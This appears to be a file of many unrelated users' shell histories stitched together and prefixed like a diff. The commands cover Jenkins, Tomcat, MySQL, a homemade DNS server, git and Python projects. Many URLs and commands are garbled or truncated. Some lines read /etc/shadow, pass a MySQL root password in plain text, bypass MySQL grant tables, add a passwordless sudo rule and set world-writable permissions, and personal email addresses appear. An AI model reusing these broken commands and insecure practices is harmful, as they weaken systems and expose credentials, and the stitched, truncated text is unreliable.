role1.yml +ll +sudo useradd ranu +id ranu +sudo usermod -aG google-sudoers ranu +id ranu +ll +sudo vi sample.py +sudo vi role1.yml +ll +hostname -f +ping raviteja.xyz +dig raviteja.xyz +$ yum install bind-utils +yum install bind-utils +sudo yum install bind-utils +dig raviteja.xyz +nslookup raviteja.xyz +curl raviteja.xyz +ansible-galaxy init +ansible-galaxy install geerlingguy.nginx +ls +ansible-galaxy -h +ls -la +ls +ls +ls +ls +vi main.yml +ls +ls -la +ls +ls +mv geerlingguy.nginx/ zett1 +ls +ls +ls -la +ansible-galaxy login +ansible-galaxy setup zett1 +ansible-config view +ansible-galaxy push zett1 +ansible-galaxyimport zett1 +ansible-galaxy import zett1 +ansible-galaxy login +ansible-galaxy import zett1 +sudo useradd jenkins +sudo yum install java +sudo su - jenkins +ansible all -m command -a "ls -a" +sudo su - jenkins +sudo vi /etc/ansible/hosts +sudo su - jenkins +top +ifconfig +if quit +iw +ls +ls +cat networks +ping +main +gcc -std=c99 -o main *.c +main +main +main +main +main +gcc -std=c99 -o main *.c +main +lsç +ls +ls +ls +ls -la +ls +ls +mkdir aula1 +touch teste +ls +ls -l +ls -la +pwd +ls +ls +ls +ls +ls -la +exit +uname +echo $PATH +ls +echo $PATH +ls +mcedit +exit +mcedit +df +dfg +df +mount] +mount +df +mount +drf +df +ls +vim primeiro +ls + +ls -la +vim primeior +vim primeiro +chmod +x primeiro +primeiro +vim primeiro +primeiro +vim primeiro +primeiro +cat primeiro +cat -n primeiro +man cat +passwd +man +ls +man +df +seq +df +seq +seq 1 10 +man seq +pager +man seq +ls +du -hs +rev +ls +ls -la +ls * +localte +locale +man man +man -v man +man --help +less +set +locale +set +ls +df -h +ls +man man +nroff +man man +apt-get +cat /dev/zero +echo 123 > /dev/null +man man +locale +export $LANG=pt_BR.UTF-8 +export LANG=pt_BR.UTF-8 +man ifconfig +locale +passwd +cat /etc/shadow +passwd +locale -a +ls +locale +cat gkljhh +sdf +cat /tklghhgb +man test +man bash +touch teste +mount +ssh localhost -l j +ld +areujtri +gmmbvmb +set +man man +ls +man test +man man +echo fuuuuck | mail -s teste josemarlohn@gmail.com +mail +ls +mail +mail +ls +mkdir lohn2 +mutt +echo fuuuuck | mutt -s teste josemarlohn@gmail.com +mail +mutt +editor +mutt +mutt_dotlock +mutt_dotlock -t +procmail +mail +passwd +ls +passwd +passwd lohn +passwd lohn2 +passwd --help +passwd +LANG=C passwd +strace +strace passwd +ls /lib/x86_64-linux-gnu/security/ +ls /lib/security/ +strace passwd +ls +passwd +strace passwd 2> a +less a +cat /etc/passwd +chfn +passwd +ls +cat a | grep not found +cat a | grep "not found" +less a +:q +cat a | grep "no sudh" +cat a | grep "no such" +cat a | grep "No such" +set |grep pts +ls +ls +ls -la +ls +ls -la | grep sh +ls +strace passwd 2>a +strace passwd 2>a +cat a | grep "No such" +strace passwd 2>a +cat a | grep "No such" +less a +passwd +cat a | grep erm +cat a | grep No +cat a | grep No | grep -v locale +passwd +strace -S9999 passwd 2> +strace -S9999 passwd 2> a +strace -S9999 passwd +strace -s9999 passwd +strace -s9999 passwd 2> a +vim a +bash +grep +cut +cat +find +find . -name teste +ls +cat case2.sh +ls -la +cat simNao.sh +cp simNao.sh simNao2.sh +chmod +x simNao2.sh +vim simNao2.sh +./simNao2.sh +ssh -T git@github.com +ssh -T git@github.com +git config -global user.name shachunbenzhu +git config --global user.name shachunbenzhu +git config --global user.email rl82645667@163.com +ssh -T git@github.com +ssh -T git@github.com +ssh -T git@github.com +ssh-keygen -t rsa -C "rl82645667@163.com" +ssh -T git@github.com +ssh -T git@github.com +ssh -T git@github.com +git remote -v +git fetch origin +git merge origin/master +ls +cat test +cat text +git fetch origin +git merge origin/master +cat test +cat text +vim text +cat text +git diff +git diff --cached +git add -m "update file" +git add text +git commit -m "update file" +git diff +git diff --cached +git push -u origin master +v.import input="/vsizip/vsicurlstates_provinces.zip" output=ne_10m_admin_1_states_provinces +exit +g.region vector=ne_10m_admin_1_states_provinces res=0:01 -p -a +cat .ssh +mkdir .sh +mkdir .ssh +mv .ssh authorized_keys +mkdir .ssh +mv authorized_keys .ssh +ls +chmod 600 authorized_keys +exit +ls +java +apt-get install tomcat +apt-get install tomcat7 +ifconfig +apt-get install tomcat7-docs tomcat7-admin tomcat7-examples +service tomcat7 restart +service tomcat7 stop +apt-get install tomcat6 tomcat6-docs tomcat6-admin tomcat6-examples +apt-get install tomcat6-common tomcat6-docs tomcat6-admin tomcat6-examples +apt-get install tomcat6-common +apt-get install libtomcat6-java +apt-get install tomcat6-common +apt-get install tomcat6 +apt-get install tomcat6-common tomcat6-docs tomcat6-admin tomcat6-examples +ls +ls +ls +ls +vi /etc/tomcat6/tomcat-users.xml +service tomcat6 restart +ls +vi 1.jsp +wgets/month_1106/20110602_181bfe1ecd48a71a5ea0PtndEz6AbSQc.rar?skey=EWsVTAF37SM9FHw3w9mU0g&stime=1468501767&sname=51CTO%CF%C2%D4%D8-Prj_xsxk.rar +ls +cat 20110602_181bfe1ecd48a71a5ea0PtndEz6AbSQc.rar\?skey\=EWsVTAF37SM9FHw3w9mU0g +srun login +scp -rp /bin/srun +srun login +wgets/month_1106/20110602_181bfe1ecd48a71a5ea0PtndEz6AbSQc.rar?skey=EWsVTAF37SM9FHw3w9mU0g&stime=1468501767&sname=51CTO%CF%C2%D4%D8-Prj_xsxk.rar +l +ls +rm 2011* +wgets/month_1106/20110602_181bfe1ecd48a71a5ea0PtndEz6AbSQc.rar?skey=EWsVTAF37SM9FHw3w9mU0g&stime=1468501767&sname=51CTO%CF%C2%D4%D8-Prj_xsxk.rar +cat 20110602_181bfe1ecd48a71a5ea0PtndEz6AbSQc.rar\?skey\=EWsVTAF37SM9FHw3w9mU0g +ifconfig +ls +rm 20110602_181bfe1ecd48a71a5ea0PtndEz6AbSQc.rar\?skey\=EWsVTAF37SM9FHw3w9mU0g +ls +ls +mv Prj_xsxk/ webapps/ROOT/haozi +ls +ls +mv * .. +mv * ../ +mv * ../ -f +ls +ls +cat * +ls +ls +ls +ls +ls +cat home.jsp +ls +exit +ls +ls +mysql -uroot < dns_manager.sql +mysql -uroot +service mysql stop +locate mysqld +/usr/bin/mysqld_safe --skip-grant-tables & +mysql -uroot +killall mysqld_safe +service mysql start +service mysql restart +kill -term mysqld_safe +killall mysqld_safe +service mysql restart +service mysql start +ps -ef| grep mysqld +killall mysqld +ps -ef| grep mysqld +kill -9 21789 +ps -ef| grep mysqld +service mysql start +killall mysqld ;service mysql start +killall mysqld ;service mysql restart +mysql -uroot +mysql -uroot -phaozi+1s +mysql -uroot -phaozi+1s index.html +vi index.html +nslookup aa.ssss.example.com +nslookup aa.ssss6.example.com +ls +nslookup aa3.ssss6.example.com +ls +python d54ced7809c9b3623eeb14491ae702de.py +nslookup aa3.ssss6.e2xample.com +nslookup aa3.ssss6.example.com +netstat -an| grep 53 +netstat -pan| grep 53 +kill 35779 +ls +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +vi dns.py +python dns.py +netstat -an | grep 53 +nslookup aa.example.com +nslookup aa.example.com +nslookup aa.example2.com +nslookup aa.example.com +nslookup aa.haozi.com +nslookup aa.example.com +nslookup aa9.example.com +ls +ls +ls +s +ls +ls +vi modules.html +nslookup aa9.example.com +nslookup aa99.example.com +nslookup aa979.example.com +nslookup aa9793.example.com +ls +vi download.html +exit +ls +python dns.py -h +python dns.py --interface= +ls +ls -la +python dns.py --interface= +vi dns.py +python dns.py --interface= +ls +ls +ls +ls -la +vi dns.py +python dns.py --interface= +ls +ls +ls +vi dns.py +vi dns.sh +ls +ls +dns配置文件 +dns默认模块 +ls +ls +ls +ls +ls +vi download.html +vi download.php +ls +vi download.html +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +ls +vi AdmindnsController.class.php +ls +ls +vi function.php +ls +vi dns.sh +rm .dns.sh.swp +vi dns.sh +sh dns.sh +vi dns.sh +sh dns.sh +vi dns.sh +sh dns.sh +ls +sh dns.sh +ls +mv dns.sh dnsd.sh +ls +vi dnsd.sh +cp dnsd.sh redisd.sh +vi redisd.sh +sh redisd.sh +vi redisd.sh +sh redisd.sh +vi redisd.sh +sh redisd.sh +vi redisd.sh +sh redisd.sh +su dns -c "redis-server + +su dns -c "redis-server +" +ls +vi redisd.sh +sh redisd.sh +sysv-rc-conf redis off +sysv-rc-conf redis-server off +sysv-rc-conf list +sysv-rc-conf --list +python dns.py -h +ls +python dns.py -t -p5353 +python dns.py -t -p53 +python dns.py -t -p53 --interface= +python dns.py -t -p5353 --interface= +ls +vi dnsd.sh +python dns.py -t -p5353 +python dns.py -t -p5353 +ls +./dnsd.sh& +vi dnsd.sh +./dnsd.sh& +vi dnsd.sh +./dnsd.sh& +vi dnsd.sh +ps -ef| grep dns +killall dns +kill -9 28492 +kill -9 32574 +kill -9 48785 +kill -9 48792 +kill -9 48800 +kill -9 48792 +ps -ef| grep dns +./dnsd.sh +clear +ls +python dns.py +netstat -an +netstat -an| 53 +netstat -an| grep 53 +netstat -pan| grep 53 +kill 38151 +netstat -pan| grep 53 +kill 38159 +netstat -pan| grep 53 +kill 38160 +netstat -pan| grep 53 +kill -9 38163 +netstat -pan| grep 53 +kill -9 38164 +netstat -pan| grep 53 +python dns.py +useradd dns +su dns -c "python dns.py" +su root -c "python dns.py" + +su dns -c "python dns.py -p5353" +service redis stop +service redis-server stop +su dns -c redis-server + +su dns -c "redis-server" +ls +cp redis-server /root/ +ls +ls +su dns "./redis-server" +chmod +x redis-server +su dns "./redis-server" + +./redis-server +chmod 777 redis-server +su dns "./redis-server" +vi redis-server +su redis "./redis-server" +su redis "./redis-server start" +ps -ef| grep redis +su redis "service redis-server start" +su redis -c "./redis-server start" +ps -ef| grep redis +su redis -c "service redis-server start" +su dns -c "redis-server&" +su dns -c "redis-server" +su dns -c redis-server +su root -c redis-server +su redis -c redis-server +cat /etc/passwd +vi /etc/passwd +su redis -c redis-server +ls +ls -la +vi redis-server +su -c dns "./redis-server start" +su dns -c "./redis-server start" +su redis -c "./redis-server start" +chmod +x redis-server +ls -la +su redis -c "./redis-server start" +su root -c "./redis-server start" +ls -la /etc/redis/redis.conf +ls +vi redis-server +su root -c "./redis-server start" +ps -ef | grep redis +su dns -c redis-server +vi redis.conf +su dns -c redis-server +ls +ls +./dnsd.sh& +chmod +x *.sh +./dnsd.sh& +nslookup baidu.com 5353 +nslookup baidu.com -p5353 +nslookup baidu.com +ls +vi port-forwarding.sh +sh port-forwarding.sh +netstat -an | grep 53 +nslookup baidu.com +ps -ef | grep dns +kill -9 25356 +ps -ef | grep dns +kill -9 25363 +ps -ef | grep dns +kill -9 25370 +ps -ef | grep dns +vi dnsd.sh +./dnsd.sh +./dnsd.sh & +nslookup baidu.com +nslookup baidu.com -p5353 +dig baidu.com @ -p5353 +vi dnsd.sh +kill -9 $(lsof -i:53 |awk '{print $2}' | tail -n 1) +kill -9 $(lsof -i:5353 |awk '{print $2}' | tail -n 1) +ps -ef| grep dns +kill -9 50414 +kill -9 $(lsof -i:5353 |awk '{print $2}' | tail -n 1) +dig baidu.com @ -p5353 +nslookup baidu.com +netstat -an |grep 53 +nslookup baidu.com +netstat -pan| grep 53 +redis-cli +ps -ef | grep redis +kill redis-server +killall redis-server +redis-server -h +su dns -c "redis-server /etc/redis/redis.conf" + +chmod +w /var/log/redis/redis-server.log +su dns -c "redis-server /etc/redis/redis.conf" +su redis -c "redis-server /etc/redis/redis.conf" +service redis-server restart +service redis-server start +ps -ef| grep redis +service redis-server start +redis-server /etc/redis/redis.conf +ls +vi redis-server +ps -ef| grep redis +vi /etc/redis/redis.conf +service redis-server start +service redis-server stop +su redis -c "redis-server /etc/redis/redis.conf" +netstat -an | grep redis-server +ps -ef | grep redis-server +ls +vi redisd.sh +killall redis-server +./redisd.sh +chmod 777 /var/log/redis/ +./redisd.sh +rm /var/log/redis/redis-server.log +./redisd.sh +./redisd.sh & +ls +ls +ls +netstat -anlp| grep 53 +netstat -anlp| grep :53 +lsof -i :53 +lsof -i:53 |awk '{print $2}' | tail -n 2 +lsof -i:53 |awk '{print $2}' +lsof -i:53 |awk '{print $2}'|tail -n 1 +ps -ef| grep python +ps -ef| grep "python dns.py" +ps -aux| grep "python dns.py"| +ps -aux| grep "python dns.py" +ps aux| grep "python dns.py" +ps aux| grep "python dns.py"| grep -v 'grep' +kill -9 $(lsof -i:22 |awk '{print $2}' | tail -n 1) +kill -9 $(lsof -i:53 |awk '{print $2}' | tail -n 1) +ns +nslookup gg.example.com +kill -9 $(lsof -i:53 |awk '{print $2}' | tail -n 1) +nslookup gg.example.com +kill -9 $(lsof -i:53 |awk '{print $2}' | tail -n 1) +nslookup gg11.example.com +kill -9 $(lsof -i:53 |awk '{print $2}' | tail -n 1) +lsof -i :53 +kill -9 $(lsof -i:53 |awk '{print $2}' | tail -n 1) +lsof -i :53 +ps aux| grep pyton +ps aux| grep python +kill -9 $(lsof -i:53 |awk '{print $2}' | tail -n 1) +kill -9 $(lsof -i:5353 |awk '{print $2}' | tail -n 1) +ps aux| grep python +lsof -i:5353 |awk '{print $2}' | tail -n 1 +kill -9 $(lsof -i:5353 |awk '{print $2}' | tail -n 1) +lsof -i:6379 |awk '{print $2}' | tail -n 1 +ps aux| grep redis +kill -9 $(lsof -i:6379 |awk '{print $2}' | tail -n 1) +ps aux| grep redis +kill -9 45546 +kill -9 50062 +kill -9 50662 +ps aux| grep redis +kill -9 $(lsof -i:6379 |awk '{print $2}' | tail -n 1) +ls +chmod +x *.sh +./port-forwarding.sh +netstat -an| grep 53 +ls +ls +ls +cp download.php /tmp/d +mkdir dns-downloader +mv d ./dns-downloader/download.php +git init +git add . +git commit -m "init" +git config --global user.email "zhl2008vvvss@gmail.com" +git config --global user.name "haozigege" +git commit -m "init" +git remote add origins-downloader.git +git push -u origin master +srun login +ping baidu,com +ping baidu.com +git push -u origin master +vi download.php +ls +ls +ls +ls +vi white_list +vi function.php +rm +rm .function.php.swp +vi download.php +ls +ls +ls +cat white_list +php -r "file_get_contents('/tmp/dns/white_list'))" +php -r "file_get_contents('/tmp/dns/white_list'));" +php -r "file_get_contents('/tmp/dns/white_list');" +php -r "echo file_get_contents('/tmp/dns/white_list');" +php -r "echo explode('\r',file_get_contents('/tmp/dns/white_list'));" +php -r "echo print_r(de('\r',file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode('\r',file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode('\rn,file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode(' +',file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode(' +'\r,file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode(' +\r',file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode('/ +',file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode('/\r +',file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode('/r +',file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode('/\r +',file_get_contents('/tmp/dns/white_list')));" +php -r "echo print_r(explode(' +php -r "echo print_r(explode('\r +',file_get_contents('/tmp/dns/white_list'))); +" +vi white_list +php -r "echo print_r(explode(',',file_get_contents('/tmp/dns/white_list'))); +" +killall vi +ls +ls -la +cp .download.php.swp .d +cp .d .download.php.swp +ls -la +vi function.php +ls +ls +vi AdmindnsController.class.php +exit +d '/home/abdias/.config/polybar' +d '/home/abdias/.config/tint2' +d '/home/abdias/.config/polybar' +d '/home/abdias/.config/jgmenu' +d '/home/abdias/.config/conky' +d '/home/abdias/.config/openbox' +d '/home/abdias/.config/conky' +d '/home/abdias/.config/openbox' +d '/home/abdias/bin' +d '/home/abdias/.config/i3' +d '/home/abdias/.config/polybar/sessions' +d '/home/abdias/.config/htop' +d '/home/abdias/.icons/default' +ls -l +ls +pwd +exit +pwd +ls +ls +exit +sudo apt-get update +ping +ifconfig +exit +pwd +sudo apt-get install oracle-java8-installer +which java +java --version +java -version +sudo wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add - && sudo echo debs.io/debian-stable binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list && sudo apt-get install jenkins +wget -q -O -s.io/debian-stable/jenkins.io.key | sudo apt-key add - +echo 'debs.io/debian-stable binary/' | tee -a /etc/apt/sources.list +java -version +sudo wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add - && sudo echo debs.io/debian-stable binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list +sudo -i +logout +git -version +git status +git --version +which java +apt-get update +sudo -i +logout +pwd +ls +sudo -i +logout +ping +ssh-keygen +/home/vagrant/.ssh/id_rsa) +cat /home/vagrant/.ssh/id_rsa) +ssh-keygen +cat /home/vagrant/.ssh/id_rsa) +cat /home/vagrant/.ssh/id_rsa +cat /home/vagrant/.ssh/id_rsa.pub +ssh-rsa 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git@github.com:Shivsantos/gitautopush.git +ls +rm -rf gitautopush/ +ls +ls +ls +git clone git@github.com:Shivsantos/gitautopush.git +ls +ls +vi gitpush.txt +git add . +git commit -m "Test" +ls +git config --global user.name "Shivsantos" +git config --global user.email "shivsantos@gmail.com" +git commit -m "Test" +ls +git push origin master +pwd +ls +chmod 777 gitautopush/ +ls +chmod 777 gitpush.txt +cat gitpush.txt +sudo chown -R : .git +sudo apt-get update +sudo chown -R : .git +sudo chown -R : .git +ls +ls +service git status +whereis git +service git start +sudo chmod -R 775 .git +sudo chmod -R 775 .git +ls +ls +vi gitpush.txt +git add . +git commit -m "Test" +git push origin master +ls +vi git.sh +./git.sh +chmod 777 git.sh +./git.sh +cat gitpush.txt +vi git.sh +ls +cat gitpush.txt +sudo vi /etc/apt/apt.conf +ifconfig +ls -lart +ls +ls -lart +rm -rf index.lock +apt-get install git +sudo apt-get install npm +clear +ps -ef | grep jenkins +service jenkins status +grep jenkins /etc/passwd +chown 777 jenkins +sudo chown 777 jenkins +vi sudoers +ls -la +vi sudoers +sudo vi sudoers +su jenkins +passwd jenkins +sudo passwd jenkins +sudo chown 777 jenkins +ls +ls +ls +pwd +su jenkins +ls +chmod 777 .ssh/ +su jenkins +mono main.exe +mono main.exe +mcs *.cs -out:main.exe +mono main.exe +cat /etc/debian_version +ip addr +cat /etc/apt/sources.list +hostname +hostnamectl +init 6 +id +pwd +ll +ls -alh +ls +exit +ll +ls +ls +cat access.log +rm -rf access.log +ls +exit +ls +ls +ls -alh +ls -alh +ls +exit +vim views.py +exit +vim views.py +python manage.py runserver -p 8080 +vim views.py +python manage.py runserver -p 8080 +vim views.py +python manage.py runserver -p 8080 +ll +vim views.py +python manage.py runserver -p 8080 +vim views.py +exit +ls +exit +sudo dpkg-reconfigure tzdata +sudo add-apt-repository ppa:deadsnakes/ppa +sudo apt-get update +sudo apt-get install python3.6 --assume-yes +sudo ln -s /usr/bin/python3.6 /usr/bin/python +sudo rm /usr/bin/python3 +sudo ln -s /usr/bin/python3.6 /usr/bin/python3 +sudo apt-get upgrade --assume-yes +sudo apt-get install build-essential unzip --assume-yes +sudo apt-get install python3-setuptools python3-dev --assume-yes +sudo apt-get install git-core --assume-yes +sudo su +curlsercontent.com/aurora/rmate/master/rmate > rmate +sudo mv rmate /usr/local/bin +sudo chmod +x /usr/local/bin/rmate +rmate ~/.bashrc +source ~/.bashrc +rmate ~/.bashrc +source ~/.bashrc +mkdir /home/ubuntu/mpcs +mkvirtualenv mpcs +pip install --upgrade boto3 +pip install --upgrade jmespath-terminal +pip install --upgrade awscli +pip install --upgrade PyMySQL +pip install --upgrade psycopg2-binary +pip install --upgrade sqlalchemy +pip install --upgrade stripe +pip install --upgrade flask +pip install --upgrade flask-sqlalchemy +pip install --upgrade gunicorn +pip install --upgrade globus_sdk +workon mpcs +deactivate +workon mpcs +python +deactivate +ll +ll .ssh +sudo adduser --disabled-password --gecos ‘mpcsroot' mpcsroot +sudo adduser --disabled-password --gecos 'mpcsroot' mpcsroot +sudo bash -c '/bin/echo campusadmin ALL=\(ALL:ALL\) NOPASSWD:ALL >> /etc/sudoers' +sudo mkdir /home/mpcsroot/.ssh +sudo nano /home/mpcsroot/.ssh/authorized_keys +sudo chmod 600 /home/mpcsroot/.ssh/authorized_keys +sudo chown -R mpcsroot:mpcsroot /home/mpcsroot/.ssh +ll +chmod 755 .ssh +ll +ll .ssh +workon mpcs +git clones-cc/gas.git +ll +ll +nano .env +./run_gas_prod.sh +cat run_gas_prod.sh +nano run_gas_prod.sh +./run_gas_prod.sh +./run_gas_prod.sh console +python +sudo netstat -tupan +g, endpoint_bridge) +python +cat /home/ubuntu/.ssh/authorized_keys +ll +ll ssl +ll /usr +ll /usr/local +ll /usr/local/sr +ll /usr/local/src +mkdir /usr/local/src/ssl +sudo mkdir /usr/local/src/ssl +sudo mv ssl/ /usr/local/src/ssl/ +ll +ll /usr/local +ll /usr/local/src +ll /usr/local/src/ssl/ +sudo mv ssl/* . +ll +rmdir ssl +sudo rmdir ssl +ll +rmate run_gas_prod.sh +./run_gas_prod.sh +./run_gas_prod.sh console +ll /usr/local/src/ssl +sudo chmod 400 /usr/local/src/ssl/* +./run_gas_prod.sh +cat log/gas.log +git clones-cc/anntools.git +ll +rmate config.txt +ll data +cat run.py +python run.py data/test/vcf +python run.py /home/ubuntu/anntools/data/test/vcf +python run.py /home/ubuntu/anntools/data/test.vcf +ll +ll +rm -rf data +cat config.txt +rm -rf anntools/ +git clones-cc/anntools.git +nano config.txt +ll +mkdir util +ll +ll +cat run_gas_prod.sh +rm -rf gas +nano .ssh/authorized_keys +sudo shutdown -h now +ll +nano .ssh/authorized_keys +sudo shutdown -h now +ll +ll /var/log +nano /var/log/cloud-init-output.log +nano /var/log/cloud-init.log +nano /var/log/cloud-init-output.log +ll +workon mpcs +python +python manage db inti +python manage db init +git clones-cc/gas-framework.git /home/ubuntu/gas +python manage db init +ll +python manage.py db init +pip install --upgrade pip +pip install --upgrade flask_migrate +pip install --upgrade flask_script +cat .ssh/authorized_keys +nano .ssh/authorized_keys +cat .ssh/authorized_keys +ll +rm -rf gas +ll +sudo shutdown -h now +ll +ll /var/lib +ll /var/lib/cloud +ll /var/lib/cloud/data +ll /var/lib/cloud/scripts/ +ll /var/lib/cloud/scripts/per-once +ll /var/lib/cloud/scripts/per-boot +ll /var/lib/cloud/scripts/per-instance +tailf /var/log/cloud-init-output.log +ll +sudo rm -rf /var/lib/cloud/* +sudo shutdown -h now +ls +rm -r -f anntools +rm -r -f util +ls +workon mpcs +echo "" > util.py +rmate util.py +mv util.py results_notify.py +ls +rmate results_notify.py +python results_notify.py +rmate results_notify.py +workon mpcs +ls +git init +git remote add originsergeyyun/utils.git +git add . +git remove . +git rm . +git rm -r * +ls +git commit -m "first commit" +git push origin master +ls +python results_notify.py +rmate results_notify.py +python results_notify.py +ls +workon mpcs +python results_notify.py +echo "" > results_archive.py +rmate results_archive.pt +rmate results_archive.py +ls +rmate results_notify.py +python results_notify.py +python results_archive.py +ls +python results_archive.py +git status +git add . +git commit -m '7 done' +git push origin master +workon mpcs +rmate results_archive.py +workon mpcs +ls +python results_archive.py +rmate results_archive.py +python results_archive.py +rmate results_archive.py +python results_archive.py +git add . +git commit -m '8 done' +git push origin master +python results_archive.py +workon mpcs +python results_archive.py +rmate results_archive.py +python results_archive.py +ls +echo "" > archive_restore.py +rmate archive_restore.py +rmate results_archive.py +python results_archive.py +ls +python archive_restore.py +python archive_restore.py [A +python archive_restore.py +python results_archive.py +rmate results_archive.py +python results_archive.py +rmate results_archive.py +rmate archive_restore.py +python results_archive.py +workon mpcs +ls +python results_notify.py +git add . +git commit -m 'bug fixing' +python results_notify.py +ls +git status +git add . +git commit -m '1-9 done' +git push origin master +python results_notify.py +python archive_restore.py +workon mpcs +python archive_restore.py +git add . +git commit -m 'error checks, refactoring' +git push origin master +python results_archive.py +workon mpcs +python results_archive.py +workon mpcs +python archive_restore.py +rmate archive_restore.py +echo "" > config.py +rmate config.py +python archive_restore.py +rmate results_archive.py +ls +rmate results_notify.py +python archive_restore.py +rmate archive_restore.py +rmate config.py +rm -rf config.py +ls +echo "" > config.ini +rmate config.ini +python archive_restore.py +pwd +apt-get install openssh-server +ifconfig +ll +mkdir java +ll +mv jdk-8u111-linux-x64.tar.gz /usr/local/java +ll +tar -xzvf jdk-8u111-linux-x64.tar.gz +ll +chown -R root:root /usr/local/java +update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_111/jre/bin/java" 1 +update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/java/jdk1.8.0_111/bin/javac" 1 +update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_111/jre/bin/javaws" 1 +update-alternatives --set java /usr/local/java/jdk1.8.0_111/jre/bin/java +update-alternatives --set javac /usr/local/java/jdk1.8.0_111/bin/javac +update-alternatives --set javaws /usr/local/java/jdk1.8.0_111/jre/bin/javaws +vim /etc/profile +reboot +su jenkins +chown o+w jenkins/ +ll /usr/share/jenkins/ +pwd +ls -la | grep jenkins +chmod o+w jenkins/ +ls -la | grep jenkins +ll +chown root:root Test_Project.war +ll +pwd +ll +mkdir tomcat +ll +mv apache-tomcat-7.0.72.tar.gz /usr/local/tomcat/ +ll +tar -xzvf apache-tomcat-7.0.72.tar.gz +ll +ll +./shutdown.sh +netstat -plant +ll +vim server.xml +./startup.sh +ll +ll +ll +mv mvn.zip /home/sumit/ +ll +apt-get install unzip +ll +unzip mvn.zip +ll +ll +ll +mvn compile +ll +ll +mvn clean package +ll +ll +ll +ll +./shutdown.sh +ll +ll +ll +ll +ll +cp Test_Project.war /usr/local/tomcat/apache-tomcat-7.0.72/webapps/ROOT +ll +./startup.sh +netstat -plant +./shutdown.sh +ll +ll +mkdir test1 +vim test.html +ll +ll +mv Test_Project.war /usr/local/tomcat/apache-tomcat-7.0.72/webapps/test1 +ll +./startup.sh +./shutdown.sh +ll +touch new.war +ll +ll +mv Test_Project.war /usr/local/tomcat/apache-tomcat-7.0.72/webapps +ll +./startup.sh +./shutdown.sh +l +ll +ll +ll +cat new.war +vi new.war +ll +ll +./startup.sh +ll +rm -rf Test_Project.war +ll +ll +ll +./startup.sh +./shutdown.sh +ll +rm -rf Test_Project.war Test_Project +ll +ll +ll +ll +ll +ll +ll +;; +ll +ll +ll +ll +./startup.sh +ll +vim tomcat-users.xml +./shutdown.sh +./startup.sh +./shutdown.sh +ll +vim tomcat-users.xml +./startup.sh +ll +ll +ll +ll +./shutdown.sh +ll +ll +rm -rf helloworld/ +ll +ll +ll +ll +ll +ll +rm -rf Test_Project/ +ll +ls -la +git -version +git --version +git clonest_Project +ll +ll +ll +ll +ll +mv Test_Project /var/lib/jenkins/workspace +ll +ll +vim maiven project +ls -la +ll +ll +ll +ll +ll +ll +rm -rf Test_Project/ +ll +rm -rf maiven project +ll +ll +ll +ll +rm -rf maven maiven project +ll +apt -get purge maiven project +ll +ll +git clonest_Project +ll +mv Test_Project /var/lib/jenkins/workspace/ +ll +ll +ll +ll +mkdir maiven +ll +mv Test_Project /var/lib/jenkins/workspace/maiven +ll +apt-get purge maven +ll +ll +apt-get install maven +ps auxf | grep maven +ls -la +ls -la | grep maven +ll +ll +ll +ll +mvn compile +ll +/var/lib/jenkins/workspace/maiven project +/var/lib/jenkins/workspace/maiven +ll +ll +ll +mvn clean package +ll +mvn clean package +ll +ll +rm -rf Test_Project +ll +ll +ll +ll +ll +ll +ll +ll +find / -name "Test_Project.war" +ll +ls -la +chmod o+w webapps/ +ls -la +ls -al +netstat -plnt +./startup.sh +ll +ll +ll +ll +ll +ll +vim authorized_keys +ip a +pwd +ssh ubuntu@ +ip a +ssh ubuntu@ +ip a +ll +ll +ll +ll +ls -la +ll +ll +ll +vim index.jsp +q +ll +rm -rf .index.jsp.swp +ll +ll +ll +vim index.jsp +ll +ll +ll +vim index.jsp +ll +ll +vim index.jsp +ll +vim index.jsp +ll +ll +./shutdown.sh +ll +cp Test_Project.war /usr/local/tomcat/apache-tomcat-7.0.72/webapps/ +ll +./startup.sh +ll +vim index.jsp +ll +ll +vim index.jsp +ll +ll +vim index.jsp +ll +vim index.jsp +ll +ll +vim index.jsp +ll +ls +ll +ll +vim index.jsp +ll +vim index.jsp +./shutdown.sh +./startup.sh +ll +ll +vim index.jsp +ps auxf | grep git +git branch +ll +ip a +ll +ll +ll +vim test.html +history +history | grep ssh +ip a +pwd +ll +ll +su sumit +ll +vim config.xml +service jenkins restart +vim config.xml +service jenkins restart +vim config.xml +service jenkins restart +vim config.xml +service jenkins restart +vim config.xml +service jenkins restart +vim config.xml +service jenkins restart +vim config.xml +service jenkins restart +vim config.xml +service jenkins restart +vim config.xml +df -Th +ll +df -Th +ip a +find / -name "docker" +find /-name Dockerfile +find /-name "Dockerfile" +ip a\ +ip a +ll +find /-name "docker-mvn" +ll +ip a +ssh sumit@ +ll +ll +rm -rf jdk-8u111-linux-x64.tar.gz +ll +rm -rf apache-tomcat-7.0.72.tar.gz +ll +ll +ll +ll +unzip src.zip +ll +rm -rf src.zip javafx-src.zip +ll +ll +vim Welcome.html +ll +ll +ll +rm -rf winstone3692125137648252674.jar +df -Th +docker ps +ip a +ll +ll +vim index.jsp +ll +ll +ll +ll +pwd +ll +pwd +ll +ll +d /usr/src/ +ll +vim index.html +rm -rf index.html +ll +vim index.jsp +pwd +pwd +vim index.jsp +service jenkins restart +netstat -plant +./startup.sh +apt-get update +apt install krb5-user samba sssd ntp +service sssd restart +systemctl status sssd.service 